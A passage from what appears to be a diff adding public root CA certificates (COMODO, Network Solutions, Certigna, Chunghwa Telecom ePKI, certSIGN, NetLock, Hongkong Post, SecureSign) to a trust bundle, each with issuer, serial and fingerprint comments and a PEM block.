+jnIFHovdRIWCQtBJwB1g8NEXLJXr9qXBkqPFwqcIYA1gBBCWeZ4WNOaptvolRTnI +HmX5k/Wq8VLcmZg9pYYaDDUz+kulBAYVHDGA76oYa8J719rO+TMg1fW9ajMtgQT7 +sFzUnKPiXB3jqUJ1XnvUd+85VLrJChgbEplJL4hL/VBi0XPnj3pDAgMBAAGjgZ0w +gZowEwYJKwYBBAGCNxQCBAYeBABDAEEwCwYDVR0PBAQDAgGGMA8GA1UdEwEB/wQF +MAMBAf8wHQYDVR0OBBYEFK9EBMJBfkiD2045AuzshHrmzsmkMDQGA1UdHwQtMCsw +KaAnoCWGI2h0dHA6Ly9jcmwuc2VjdXJldHJ1c3QuY29tL1NHQ0EuY3JsMBAGCSsG +AQQBgjcVAQQDAgEAMA0GCSqGSIb3DQEBBQUAA4IBAQBjGghAfaReUw132HquHw0L +URYD7xh8yOOvaliTFGCRsoTciE6+OYo68+aCiV0BN7OrJKQVDpI1WkpEXk5X+nXO +H0jOZvQ8QCaSmGwb7iRGDBezUqXbpZGRzzfTb+cnCDpOGR86p1hcF895P4vkp9Mm +I50mD1hp/Ed+stCNi5O/KU9DaXR2Z0vPB4zmAve14bRDtUstFJ/53CYNv6ZHdAbY +iNE6KTCEztI5gGIbqMdXSbxqVVFnFUq+NQfk1XWYN3kwFNspnWzFacxHVaIw98xc +f8LDmBxrThaA63p4ZUWiABqvDA1VZDRIuJK58bRQKfJPIx/abKwfROHdI3hRW8cW +-----END CERTIFICATE----- + +# Issuer: CN=COMODO Certification Authority O=COMODO CA Limited +# Subject: CN=COMODO Certification Authority O=COMODO CA Limited +# Label: "COMODO Certification Authority" +# Serial: 104350513648249232941998508985834464573 +# MD5 Fingerprint: 5c:48:dc:f7:42:72:ec:56:94:6d:1c:cc:71:35:80:75 +# SHA1 Fingerprint: 66:31:bf:9e:f7:4f:9e:b6:c9:d5:a6:0c:ba:6a:be:d1:f7:bd:ef:7b +# SHA256 Fingerprint: 0c:2c:d6:3d:f7:80:6f:a3:99:ed:e8:09:11:6b:57:5b:f8:79:89:f0:65:18:f9:80:8c:86:05:03:17:8b:af:66 +-----BEGIN CERTIFICATE----- +MIIEHTCCAwWgAwIBAgIQToEtioJl4AsC7j41AkblPTANBgkqhkiG9w0BAQUFADCB +gTELMAkGA1UEBhMCR0IxGzAZBgNVBAgTEkdyZWF0ZXIgTWFuY2hlc3RlcjEQMA4G +A1UEBxMHU2FsZm9yZDEaMBgGA1UEChMRQ09NT0RPIENBIExpbWl0ZWQxJzAlBgNV +BAMTHkNPTU9ETyBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTAeFw0wNjEyMDEwMDAw +MDBaFw0yOTEyMzEyMzU5NTlaMIGBMQswCQYDVQQGEwJHQjEbMBkGA1UECBMSR3Jl +YXRlciBNYW5jaGVzdGVyMRAwDgYDVQQHEwdTYWxmb3JkMRowGAYDVQQKExFDT01P +RE8gQ0EgTGltaXRlZDEnMCUGA1UEAxMeQ09NT0RPIENlcnRpZmljYXRpb24gQXV0 +aG9yaXR5MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0ECLi3LjkRv3 +UcEbVASY06m/weaKXTuH+7uIzg3jLz8GlvCiKVCZrts7oVewdFFxze1CkU1B/qnI +2GqGd0S7WWaXUF601CxwRM/aN5VCaTwwxHGzUvAhTaHYujl8HJ6jJJ3ygxaYqhZ8 +Q5sVW7euNJH+1GImGEaaP+vB+fGQV+useg2L23IwambV4EajcNxo2f8ESIl33rXp ++2dtQem8Ob0y2WIC8bGoPW43nOIv4tOiJovGuFVDiOEjPqXSJDlqR6sA1KGzqSX+ +DT+nHbrTUcELpNqsOO9VUCQFZUaTNE8tja3G1CEZ0o7KBWFxB3NH5YoZEr0ETc5O +nKVIrLsm9wIDAQABo4GOMIGLMB0GA1UdDgQWBBQLWOWLxkwVN6RAqTCpIb5HNlpW +/zAOBgNVHQ8BAf8EBAMCAQYwDwYDVR0TAQH/BAUwAwEB/zBJBgNVHR8EQjBAMD6g +PKA6hjhodHRwOi8vY3JsLmNvbW9kb2NhLmNvbS9DT01PRE9DZXJ0aWZpY2F0aW9u +QXV0aG9yaXR5LmNybDANBgkqhkiG9w0BAQUFAAOCAQEAPpiem/Yb6dc5t3iuHXIY +SdOH5EOC6z/JqvWote9VfCFSZfnVDeFs9D6Mk3ORLgLETgdxb8CPOGEIqB6BCsAv +IC9Bi5HcSEW88cbeunZrM8gALTFGTO3nnc+IlP8zwFboJIYmuNg4ON8qa90SzMc/ +RxdMosIGlgnW2/4/PEZB31jiVg88O8EckzXZOFKs7sjsLjBOlDW0JB9LeGna8gI4 +zJVSk/BwJVmcIGfE7vmLV2H0knZ9P4SNVbfo5azV8fUZVqZa+5Acr5Pr5RzUZ5dd +BA6+C4OmF4O5MBKgxTMVBbkN+8cFduPYSo38NBejxiEovjBFMR7HeL5YYTisO+IB +ZQ== +-----END CERTIFICATE----- + +# Issuer: CN=Network Solutions Certificate Authority O=Network Solutions L.L.C. +# Subject: CN=Network Solutions Certificate Authority O=Network Solutions L.L.C. +# Label: "Network Solutions Certificate Authority" +# Serial: 116697915152937497490437556386812487904 +# MD5 Fingerprint: d3:f3:a6:16:c0:fa:6b:1d:59:b1:2d:96:4d:0e:11:2e +# SHA1 Fingerprint: 74:f8:a3:c3:ef:e7:b3:90:06:4b:83:90:3c:21:64:60:20:e5:df:ce +# SHA256 Fingerprint: 15:f0:ba:00:a3:ac:7a:f3:ac:88:4c:07:2b:10:11:a0:77:bd:77:c0:97:f4:01:64:b2:f8:59:8a:bd:83:86:0c +-----BEGIN CERTIFICATE----- +MIID5jCCAs6gAwIBAgIQV8szb8JcFuZHFhfjkDFo4DANBgkqhkiG9w0BAQUFADBi +MQswCQYDVQQGEwJVUzEhMB8GA1UEChMYTmV0d29yayBTb2x1dGlvbnMgTC5MLkMu +MTAwLgYDVQQDEydOZXR3b3JrIFNvbHV0aW9ucyBDZXJ0aWZpY2F0ZSBBdXRob3Jp +dHkwHhcNMDYxMjAxMDAwMDAwWhcNMjkxMjMxMjM1OTU5WjBiMQswCQYDVQQGEwJV +UzEhMB8GA1UEChMYTmV0d29yayBTb2x1dGlvbnMgTC5MLkMuMTAwLgYDVQQDEydO +ZXR3b3JrIFNvbHV0aW9ucyBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkwggEiMA0GCSqG +SIb3DQEBAQUAA4IBDwAwggEKAoIBAQDkvH6SMG3G2I4rC7xGzuAnlt7e+foS0zwz +c7MEL7xxjOWftiJgPl9dzgn/ggwbmlFQGiaJ3dVhXRncEg8tCqJDXRfQNJIg6nPP +OCwGJgl6cvf6UDL4wpPTaaIjzkGxzOTVHzbRijr4jGPiFFlp7Q3Tf2vouAPlT2rl +mGNpSAW+Lv8ztumXWWn4Zxmuk2GWRBXTcrA/vGp97Eh/jcOrqnErU2lBUzS1sLnF +BgrEsEX1QV1uiUV7PTsmjHTC5dLRfbIR1PtYMiKagMnc/Qzpf14Dl847ABSHJ3A4 +qY5usyd2mFHgBeMhqxrVhSI8KbWaFsWAqPS7azCPL0YCorEMIuDTAgMBAAGjgZcw +gZQwHQYDVR0OBBYEFCEwyfsA106Y2oeqKtCnLrFAMadMMA4GA1UdDwEB/wQEAwIB +BjAPBgNVHRMBAf8EBTADAQH/MFIGA1UdHwRLMEkwR6BFoEOGQWh0dHA6Ly9jcmwu +bmV0c29sc3NsLmNvbS9OZXR3b3JrU29sdXRpb25zQ2VydGlmaWNhdGVBdXRob3Jp +dHkuY3JsMA0GCSqGSIb3DQEBBQUAA4IBAQC7rkvnt1frf6ott3NHhWrB5KUd5Oc8 +6fRZZXe1eltajSU24HqXLjjAV2CDmAaDn7l2em5Q4LqILPxFzBiwmZVRDuwduIj/ +h1AcgsLj4DKAv6ALR8jDMe+ZZzKATxcheQxpXN5eNK4CtSbqUN9/GGUsyfJj4akH +/nxxH2szJGoeBfcFaMBqEssuXmHLrijTfsK0ZpEmXzwuJF/LWA/rKOyvEZbz3Htv +wKeI8lN3s2Berq4o2jUsbzRF0ybh3uxbTydrFny9RAQYgrOJeRcQcT16ohZO9QHN +pGxlaKFJdlxDydi8NmdspZS11My5vWo1ViHe2MPr+8ukYEywVaCge1ey +-----END CERTIFICATE----- + +# Issuer: CN=COMODO ECC Certification Authority O=COMODO CA Limited +# Subject: CN=COMODO ECC Certification Authority O=COMODO CA Limited +# Label: "COMODO ECC Certification Authority" +# Serial: 41578283867086692638256921589707938090 +# MD5 Fingerprint: 7c:62:ff:74:9d:31:53:5e:68:4a:d5:78:aa:1e:bf:23 +# SHA1 Fingerprint: 9f:74:4e:9f:2b:4d:ba:ec:0f:31:2c:50:b6:56:3b:8e:2d:93:c3:11 +# SHA256 Fingerprint: 17:93:92:7a:06:14:54:97:89:ad:ce:2f:8f:34:f7:f0:b6:6d:0f:3a:e3:a3:b8:4d:21:ec:15:db:ba:4f:ad:c7 +-----BEGIN CERTIFICATE----- +MIICiTCCAg+gAwIBAgIQH0evqmIAcFBUTAGem2OZKjAKBggqhkjOPQQDAzCBhTEL +MAkGA1UEBhMCR0IxGzAZBgNVBAgTEkdyZWF0ZXIgTWFuY2hlc3RlcjEQMA4GA1UE +BxMHU2FsZm9yZDEaMBgGA1UEChMRQ09NT0RPIENBIExpbWl0ZWQxKzApBgNVBAMT +IkNPTU9ETyBFQ0MgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkwHhcNMDgwMzA2MDAw +MDAwWhcNMzgwMTE4MjM1OTU5WjCBhTELMAkGA1UEBhMCR0IxGzAZBgNVBAgTEkdy +ZWF0ZXIgTWFuY2hlc3RlcjEQMA4GA1UEBxMHU2FsZm9yZDEaMBgGA1UEChMRQ09N +T0RPIENBIExpbWl0ZWQxKzApBgNVBAMTIkNPTU9ETyBFQ0MgQ2VydGlmaWNhdGlv +biBBdXRob3JpdHkwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAAQDR3svdcmCFYX7deSR +FtSrYpn1PlILBs5BAH+X4QokPB0BBO490o0JlwzgdeT6+3eKKvUDYEs2ixYjFq0J +cfRK9ChQtP6IHG4/bC8vCVlbpVsLM5niwz2J+Wos77LTBumjQjBAMB0GA1UdDgQW +BBR1cacZSBm8nZ3qQUfflMRId5nTeTAOBgNVHQ8BAf8EBAMCAQYwDwYDVR0TAQH/ +BAUwAwEB/zAKBggqhkjOPQQDAwNoADBlAjEA7wNbeqy3eApyt4jf/7VGFAkK+qDm +fQjGGoe9GKhzvSbKYAydzpmfz1wPMOG+FDHqAjAU9JM8SaczepBGR7NjfRObTrdv +GDeAU/7dIOA1mjbRxwG55tzd8/8dLDoWV9mSOdY= +-----END CERTIFICATE----- + +# Issuer: CN=Certigna O=Dhimyotis +# Subject: CN=Certigna O=Dhimyotis +# Label: "Certigna" +# Serial: 18364802974209362175 +# MD5 Fingerprint: ab:57:a6:5b:7d:42:82:19:b5:d8:58:26:28:5e:fd:ff +# SHA1 Fingerprint: b1:2e:13:63:45:86:a4:6f:1a:b2:60:68:37:58:2d:c4:ac:fd:94:97 +# SHA256 Fingerprint: e3:b6:a2:db:2e:d7:ce:48:84:2f:7a:c5:32:41:c7:b7:1d:54:14:4b:fb:40:c1:1f:3f:1d:0b:42:f5:ee:a1:2d +-----BEGIN CERTIFICATE----- +MIIDqDCCApCgAwIBAgIJAP7c4wEPyUj/MA0GCSqGSIb3DQEBBQUAMDQxCzAJBgNV +BAYTAkZSMRIwEAYDVQQKDAlEaGlteW90aXMxETAPBgNVBAMMCENlcnRpZ25hMB4X +DTA3MDYyOTE1MTMwNVoXDTI3MDYyOTE1MTMwNVowNDELMAkGA1UEBhMCRlIxEjAQ +BgNVBAoMCURoaW15b3RpczERMA8GA1UEAwwIQ2VydGlnbmEwggEiMA0GCSqGSIb3 +DQEBAQUAA4IBDwAwggEKAoIBAQDIaPHJ1tazNHUmgh7stL7qXOEm7RFHYeGifBZ4 +QCHkYJ5ayGPhxLGWkv8YbWkj4Sti993iNi+RB7lIzw7sebYs5zRLcAglozyHGxny +gQcPOJAZ0xH+hrTy0V4eHpbNgGzOOzGTtvKg0KmVEn2lmsxryIRWijOp5yIVUxbw +zBfsV1/pogqYCd7jX5xv3EjjhQsVWqa6n6xI4wmy9/Qy3l40vhx4XUJbzg4ij02Q +130yGLMLLGq/jj8UEYkgDncUtT2UCIf3JR7VsmAA7G8qKCVuKj4YYxclPz5EIBb2 +JsglrgVKtOdjLPOMFlN+XPsRGgjBRmKfIrjxwo1p3Po6WAbfAgMBAAGjgbwwgbkw +DwYDVR0TAQH/BAUwAwEB/zAdBgNVHQ4EFgQUGu3+QTmQtCRZvgHyUtVF9lo53BEw +ZAYDVR0jBF0wW4AUGu3+QTmQtCRZvgHyUtVF9lo53BGhOKQ2MDQxCzAJBgNVBAYT +AkZSMRIwEAYDVQQKDAlEaGlteW90aXMxETAPBgNVBAMMCENlcnRpZ25hggkA/tzj +AQ/JSP8wDgYDVR0PAQH/BAQDAgEGMBEGCWCGSAGG+EIBAQQEAwIABzANBgkqhkiG +9w0BAQUFAAOCAQEAhQMeknH2Qq/ho2Ge6/PAD/Kl1NqV5ta+aDY9fm4fTIrv0Q8h +bV6lUmPOEvjvKtpv6zf+EwLHyzs+ImvaYS5/1HI93TDhHkxAGYwP15zRgzB7mFnc +fca5DClMoTOi62c6ZYTTluLtdkVwj7Ur3vkj1kluPBS1xp81HlDQwY9qcEQCYsuu +HWhBp6pX6FOqB9IG9tUUBguRA3UsbHK1YZWaDYu5Def131TN3ubY1gkIl2PlwS6w +t0QmwCbAr1UwnjvVNioZBPRcHv/PLLf/0P2HQBHVESO7SMAhqaQoLf0V+LBOK/Qw +WyH8EZE0vkHve52Xdf+XlcCWWC/qu0bXu+TZLg== +-----END CERTIFICATE----- + +# Issuer: O=Chunghwa Telecom Co., Ltd. OU=ePKI Root Certification Authority +# Subject: O=Chunghwa Telecom Co., Ltd. OU=ePKI Root Certification Authority +# Label: "ePKI Root Certification Authority" +# Serial: 28956088682735189655030529057352760477 +# MD5 Fingerprint: 1b:2e:00:ca:26:06:90:3d:ad:fe:6f:15:68:d3:6b:b3 +# SHA1 Fingerprint: 67:65:0d:f1:7e:8e:7e:5b:82:40:a4:f4:56:4b:cf:e2:3d:69:c6:f0 +# SHA256 Fingerprint: c0:a6:f4:dc:63:a2:4b:fd:cf:54:ef:2a:6a:08:2a:0a:72:de:35:80:3e:2f:f5:ff:52:7a:e5:d8:72:06:df:d5 +-----BEGIN CERTIFICATE----- +MIIFsDCCA5igAwIBAgIQFci9ZUdcr7iXAF7kBtK8nTANBgkqhkiG9w0BAQUFADBe +MQswCQYDVQQGEwJUVzEjMCEGA1UECgwaQ2h1bmdod2EgVGVsZWNvbSBDby4sIEx0 +ZC4xKjAoBgNVBAsMIWVQS0kgUm9vdCBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTAe +Fw0wNDEyMjAwMjMxMjdaFw0zNDEyMjAwMjMxMjdaMF4xCzAJBgNVBAYTAlRXMSMw +IQYDVQQKDBpDaHVuZ2h3YSBUZWxlY29tIENvLiwgTHRkLjEqMCgGA1UECwwhZVBL +SSBSb290IENlcnRpZmljYXRpb24gQXV0aG9yaXR5MIICIjANBgkqhkiG9w0BAQEF +AAOCAg8AMIICCgKCAgEA4SUP7o3biDN1Z82tH306Tm2d0y8U82N0ywEhajfqhFAH +SyZbCUNsIZ5qyNUD9WBpj8zwIuQf5/dqIjG3LBXy4P4AakP/h2XGtRrBp0xtInAh +ijHyl3SJCRImHJ7K2RKilTza6We/CKBk49ZCt0Xvl/T29de1ShUCWH2YWEtgvM3X +DZoTM1PRYfl61dd4s5oz9wCGzh1NlDivqOx4UXCKXBCDUSH3ET00hl7lSM2XgYI1 +TBnsZfZrxQWh7kcT1rMhJ5QQCtkkO7q+RBNGMD+XPNjX12ruOzjjK9SXDrkb5wdJ +fzcq+Xd4z1TtW0ado4AOkUPB1ltfFLqfpo0kR0BZv3I4sjZsN/+Z0V0OWQqraffA +sgRFelQArr5T9rXn4fg8ozHSqf4hUmTFpmfwdQcGlBSBVcYn5AGPF8Fqcde+S/uU +WH1+ETOxQvdibBjWzwloPn9s9h6PYq2lY9sJpx8iQkEeb5mKPtf5P0B6ebClAZLS +nT0IFaUQAS2zMnaolQ2zepr7BxB4EW/hj8e6DyUadCrlHJhBmd8hh+iVBmoKs2pH +dmX2Os+PYhcZewoozRrSgx4hxyy/vv9haLdnG7t4TY3OZ+XkwY63I2binZB1NJip +NiuKmpS5nezMirH4JYlcWrYvjB9teSSnUmjDhDXiZo1jDiVN1Rmy5nk3pyKdVDEC +AwEAAaNqMGgwHQYDVR0OBBYEFB4M97Zn8uGSJglFwFU5Lnc/QkqiMAwGA1UdEwQF +MAMBAf8wOQYEZyoHAAQxMC8wLQIBADAJBgUrDgMCGgUAMAcGBWcqAwAABBRFsMLH +ClZ87lt4DJX5GFPBphzYEDANBgkqhkiG9w0BAQUFAAOCAgEACbODU1kBPpVJufGB +uvl2ICO1J2B01GqZNF5sAFPZn/KmsSQHRGoqxqWOeBLoR9lYGxMqXnmbnwoqZ6Yl +PwZpVnPDimZI+ymBV3QGypzqKOg4ZyYr8dW1P2WT+DZdjo2NQCCHGervJ8A9tDkP +JXtoUHRVnAxZfVo9QZQlUgjgRywVMRnVvwdVxrsStZf0X4OFunHB2WyBEXYKCrC/ +gpf36j36+uwtqSiUO1bd0lEursC9CBWMd1I0ltabrNMdjmEPNXubrjlpC2JgQCA2 +j6/7Nu4tCEoduL+bXPjqpRugc6bY+G7gMwRfaKonh+3ZwZCc7b3jajWvY9+rGNm6 +5ulK6lCKD2GTHuItGeIwlDWSXQ62B68ZgI9HkFFLLk3dheLSClIKF5r8GrBQAuUB +o2M3IUxExJtRmREOc5wGj1QupyheRDmHVi03vYVElOEMSyycw5KFNGHLD7ibSkNS +/jQ6fbjpKdx2qcgw+BRxgMYeNkh0IkFch4LoGHGLQYlE535YW6i4jRPpp2zDR+2z +Gp1iro2C6pSe3VkQw63d4k3jMdXH7OjysP6SHhYKGvzZ8/gntsm+HbRsZJB/9OTE +W9c3rkIO3aQab3yIVMUWbuF6aC74Or8NpDyJO3inTmODBCEIZ43ygknQW/2xzQ+D +hNQ+IIX3Sj0rnP0qCglN6oH4EZw= +-----END CERTIFICATE----- + +# Issuer: O=certSIGN OU=certSIGN ROOT CA +# Subject: O=certSIGN OU=certSIGN ROOT CA +# Label: "certSIGN ROOT CA" +# Serial: 35210227249154 +# MD5 Fingerprint: 18:98:c0:d6:e9:3a:fc:f9:b0:f5:0c:f7:4b:01:44:17 +# SHA1 Fingerprint: fa:b7:ee:36:97:26:62:fb:2d:b0:2a:f6:bf:03:fd:e8:7c:4b:2f:9b +# SHA256 Fingerprint: ea:a9:62:c4:fa:4a:6b:af:eb:e4:15:19:6d:35:1c:cd:88:8d:4f:53:f3:fa:8a:e6:d7:c4:66:a9:4e:60:42:bb +-----BEGIN CERTIFICATE----- +MIIDODCCAiCgAwIBAgIGIAYFFnACMA0GCSqGSIb3DQEBBQUAMDsxCzAJBgNVBAYT +AlJPMREwDwYDVQQKEwhjZXJ0U0lHTjEZMBcGA1UECxMQY2VydFNJR04gUk9PVCBD +QTAeFw0wNjA3MDQxNzIwMDRaFw0zMTA3MDQxNzIwMDRaMDsxCzAJBgNVBAYTAlJP +MREwDwYDVQQKEwhjZXJ0U0lHTjEZMBcGA1UECxMQY2VydFNJR04gUk9PVCBDQTCC +ASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALczuX7IJUqOtdu0KBuqV5Do +0SLTZLrTk+jUrIZhQGpgV2hUhE28alQCBf/fm5oqrl0Hj0rDKH/v+yv6efHHrfAQ +UySQi2bJqIirr1qjAOm+ukbuW3N7LBeCgV5iLKECZbO9xSsAfsT8AzNXDe3i+s5d +RdY4zTW2ssHQnIFKquSyAVwdj1+ZxLGt24gh65AIgoDzMKND5pCCrlUoSe1b16kQ +OA7+j0xbm0bqQfWwCHTD0IgztnzXdN/chNFDDnU5oSVAKOp4yw4sLjmdjItuFhwv +JoIQ4uNllAoEwF73XVv4EOLQunpL+943AAAaWyjj0pxzPjKHmKHJUS/X3qwzs08C +AwEAAaNCMEAwDwYDVR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAcYwHQYDVR0O +BBYEFOCMm9slSbPxfIbWskKHC9BroNnkMA0GCSqGSIb3DQEBBQUAA4IBAQA+0hyJ +LjX8+HXd5n9liPRyTMks1zJO890ZeUe9jjtbkw9QSSQTaxQGcu8J06Gh40CEyecY +MnQ8SG4Pn0vU9x7Tk4ZkVJdjclDVVc/6IJMCopvDI5NOFlV2oHB5bc0hH88vLbwZ +44gx+FkagQnIl6Z0x2DEW8xXjrJ1/RsCCdtZb3KTafcxQdaIOL+Hsr0Wefmq5L6I +Jd1hJyMctTEHBDa0GpC9oHRxUIltvBTjD4au8as+x6AJzKNI0eDbZOeStc+vckNw +i/nDhDwTqn6Sm1dTk/pwwpEOMfmbZ13pljheX7NzTogVZ96edhBiIL5VaZVDADlN +9u6wWk5JRFRYX0KD +-----END CERTIFICATE----- + +# Issuer: CN=NetLock Arany (Class Gold) F\u0151tan\xfas\xedtv\xe1ny O=NetLock Kft. OU=Tan\xfas\xedtv\xe1nykiad\xf3k (Certification Services) +# Subject: CN=NetLock Arany (Class Gold) F\u0151tan\xfas\xedtv\xe1ny O=NetLock Kft. OU=Tan\xfas\xedtv\xe1nykiad\xf3k (Certification Services) +# Label: "NetLock Arany (Class Gold) F\u0151tan\xfas\xedtv\xe1ny" +# Serial: 80544274841616 +# MD5 Fingerprint: c5:a1:b7:ff:73:dd:d6:d7:34:32:18:df:fc:3c:ad:88 +# SHA1 Fingerprint: 06:08:3f:59:3f:15:a1:04:a0:69:a4:6b:a9:03:d0:06:b7:97:09:91 +# SHA256 Fingerprint: 6c:61:da:c3:a2:de:f0:31:50:6b:e0:36:d2:a6:fe:40:19:94:fb:d1:3d:f9:c8:d4:66:59:92:74:c4:46:ec:98 +-----BEGIN CERTIFICATE----- +MIIEFTCCAv2gAwIBAgIGSUEs5AAQMA0GCSqGSIb3DQEBCwUAMIGnMQswCQYDVQQG +EwJIVTERMA8GA1UEBwwIQnVkYXBlc3QxFTATBgNVBAoMDE5ldExvY2sgS2Z0LjE3 +MDUGA1UECwwuVGFuw7pzw610dsOhbnlraWFkw7NrIChDZXJ0aWZpY2F0aW9uIFNl +cnZpY2VzKTE1MDMGA1UEAwwsTmV0TG9jayBBcmFueSAoQ2xhc3MgR29sZCkgRsWR +dGFuw7pzw610dsOhbnkwHhcNMDgxMjExMTUwODIxWhcNMjgxMjA2MTUwODIxWjCB +pzELMAkGA1UEBhMCSFUxETAPBgNVBAcMCEJ1ZGFwZXN0MRUwEwYDVQQKDAxOZXRM +b2NrIEtmdC4xNzA1BgNVBAsMLlRhbsO6c8OtdHbDoW55a2lhZMOzayAoQ2VydGlm +aWNhdGlvbiBTZXJ2aWNlcykxNTAzBgNVBAMMLE5ldExvY2sgQXJhbnkgKENsYXNz +IEdvbGQpIEbFkXRhbsO6c8OtdHbDoW55MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A +MIIBCgKCAQEAxCRec75LbRTDofTjl5Bu0jBFHjzuZ9lk4BqKf8owyoPjIMHj9DrT +lF8afFttvzBPhCf2nx9JvMaZCpDyD/V/Q4Q3Y1GLeqVw/HpYzY6b7cNGbIRwXdrz +AZAj/E4wqX7hJ2Pn7WQ8oLjJM2P+FpD/sLj916jAwJRDC7bVWaaeVtAkH3B5r9s5 +VA1lddkVQZQBr17s9o3x/61k/iCa11zr/qYfCGSji3ZVrR47KGAuhyXoqq8fxmRG +ILdwfzzeSNuWU7c5d+Qa4scWhHaXWy+7GRWF+GmF9ZmnqfI0p6m2pgP8b4Y9VHx2 +BJtr+UBdADTHLpl1neWIA6pN+APSQnbAGwIDAKiLo0UwQzASBgNVHRMBAf8ECDAG +AQH/AgEEMA4GA1UdDwEB/wQEAwIBBjAdBgNVHQ4EFgQUzPpnk/C2uNClwB7zU/2M +U9+D15YwDQYJKoZIhvcNAQELBQADggEBAKt/7hwWqZw8UQCgwBEIBaeZ5m8BiFRh +bvG5GK1Krf6BQCOUL/t1fC8oS2IkgYIL9WHxHG64YTjrgfpioTtaYtOUZcTh5m2C ++C8lcLIhJsFyUR+MLMOEkMNaj7rP9KdlpeuY0fsFskZ1FSNqb4VjMIDw1Z4fKRzC +bLBQWV2QWzuoDTDPv31/zvGdg73JRm4gpvlhUbohL3u+pRVjodSVh/GeufOJ8z2F +uLjbvrW5KfnaNwUASZQDhETnv0Mxz3WLJdH0pmT1kvarBes96aULNmLazAZfNou2 +XjG4Kvte9nHfRCaexOYNkbQudZWAUWpLMKawYqGT8ZvYzsRjdT9ZR7E= +-----END CERTIFICATE----- + +# Issuer: CN=Hongkong Post Root CA 1 O=Hongkong Post +# Subject: CN=Hongkong Post Root CA 1 O=Hongkong Post +# Label: "Hongkong Post Root CA 1" +# Serial: 1000 +# MD5 Fingerprint: a8:0d:6f:39:78:b9:43:6d:77:42:6d:98:5a:cc:23:ca +# SHA1 Fingerprint: d6:da:a8:20:8d:09:d2:15:4d:24:b5:2f:cb:34:6e:b2:58:b2:8a:58 +# SHA256 Fingerprint: f9:e6:7d:33:6c:51:00:2a:c0:54:c6:32:02:2d:66:dd:a2:e7:e3:ff:f1:0a:d0:61:ed:31:d8:bb:b4:10:cf:b2 +-----BEGIN CERTIFICATE----- +MIIDMDCCAhigAwIBAgICA+gwDQYJKoZIhvcNAQEFBQAwRzELMAkGA1UEBhMCSEsx +FjAUBgNVBAoTDUhvbmdrb25nIFBvc3QxIDAeBgNVBAMTF0hvbmdrb25nIFBvc3Qg +Um9vdCBDQSAxMB4XDTAzMDUxNTA1MTMxNFoXDTIzMDUxNTA0NTIyOVowRzELMAkG +A1UEBhMCSEsxFjAUBgNVBAoTDUhvbmdrb25nIFBvc3QxIDAeBgNVBAMTF0hvbmdr +b25nIFBvc3QgUm9vdCBDQSAxMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC +AQEArP84tulmAknjorThkPlAj3n54r15/gK97iSSHSL22oVyaf7XPwnU3ZG1ApzQ +jVrhVcNQhrkpJsLj2aDxaQMoIIBFIi1WpztUlVYiWR8o3x8gPW2iNr4joLFutbEn +PzlTCeqrauh0ssJlXI6/fMN4hM2eFvz1Lk8gKgifd/PFHsSaUmYeSF7jEAaPIpjh +ZY4bXSNmO7ilMlHIhqqhqZ5/dpTCpmy3QfDVyAY45tQM4vM7TG1QjMSDJ8EThFk9 +nnV0ttgCXjqQesBCNnLsak3c78QA3xMYV18meMjWCnl3v/evt3a5pQuEF10Q6m/h +q5URX208o1xNg1vysxmKgIsLhwIDAQABoyYwJDASBgNVHRMBAf8ECDAGAQH/AgED +MA4GA1UdDwEB/wQEAwIBxjANBgkqhkiG9w0BAQUFAAOCAQEADkbVPK7ih9legYsC +mEEIjEy82tvuJxuC52pF7BaLT4Wg87JwvVqWuspube5Gi27nKi6Wsxkz67SfqLI3 +7piol7Yutmcn1KZJ/RyTZXaeQi/cImyaT/JaFTmxcdcrUehtHJjA2Sr0oYJ71clB +oiMBdDhViw+5LmeiIAQ32pwL0xch4I+XeTRvhEgCIDMb5jREn5Fw9IBehEPCKdJs +EhTkYY2sEJCehFC78JZvRZ+K88psT/oROhUVRsPNH4NbLUES7VBnQRM9IauUiqpO +fMGx+6fWtScvl6tu4B3i0RwsH0Ti/L6RoZz71ilTc4afU9hDDl3WY4JxHYB0yvbi +AmvZWg== +-----END CERTIFICATE----- + +# Issuer: CN=SecureSign RootCA11 O=Japan Certification Services, Inc. +# Subject: CN=SecureSign RootCA11 O=Japan Certification Services, Inc. +# Label: "SecureSign RootCA11" +# Serial: 1 +# MD5 Fingerprint: b7:52:74:e2:92:b4:80:93:f2:75:e4:cc:d7:f2:ea:26 +# SHA1 Fingerprint: 3b:c4:9f:48:f8:f3:73:a0:9c:1e:bd:f8:5b:b1:c3:65:c7:d8:11:b3 +# SHA256 Fingerprint: bf:0f:ee:fb:9e:3a:58:1a:d5:f9:e9:db:75:89:98:57:43:d2:61:08:5c:4d:31:4f:6f:5d:72:59:aa:42:16:12 +-----BEGIN CERTIFICATE----- +MIIDbTCCAlWgAwIBAgIBATANBgkqhkiG9w0BAQUFADBYMQswCQYDVQQGEwJKUDEr +MCkGA1UEChMiSmFwYW4gQ2VydGlmaWNhdGlvbiBTZXJ2aWNlcywgSW5jLjEcMBoG +A1UEAxMTU2VjdXJlU2lnbiBSb290Q0ExMTAeFw0wOTA0MDgwNDU2NDdaFw0yOTA0 +MDgwNDU2NDdaMFgxCzAJBgNVBAYTAkpQMSswKQYDVQQKEyJKYXBhbiBDZXJ0aWZp +Y2F0aW9uIFNlcnZpY2VzLCBJbmMuMRwwGgYDVQQDExNTZWN1cmVTaWduIFJvb3RD +QTExMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA/XeqpRyQBTvLTJsz +i1oURaTnkBbR31fSIRCkF/3frNYfp+TbfPfs37gD2pRY/V1yfIw/XwFndBWW4wI8 +h9uuywGOwvNmxoVF9ALGOrVisq/6nL+k5tSAMJjzDbaTj6nU2DbysPyKyiyhFTOV +MdrAG/LuYpmGYz+/3ZMqg6h2uRMft85OQoWPIucuGvKVCbIFtUROd6EgvanyTgp9 +UK31BQ1FT0Zx/Sg+U/sE2C3XZR1KG/rPO7AxmjVuyIsG0wCR8pQIZUyxNAYAeoni +8McDWc/V1uinMrPmmECGxc0nEovMe863ETxiYAcjPitAbpSACW22s293bzUIUPsC 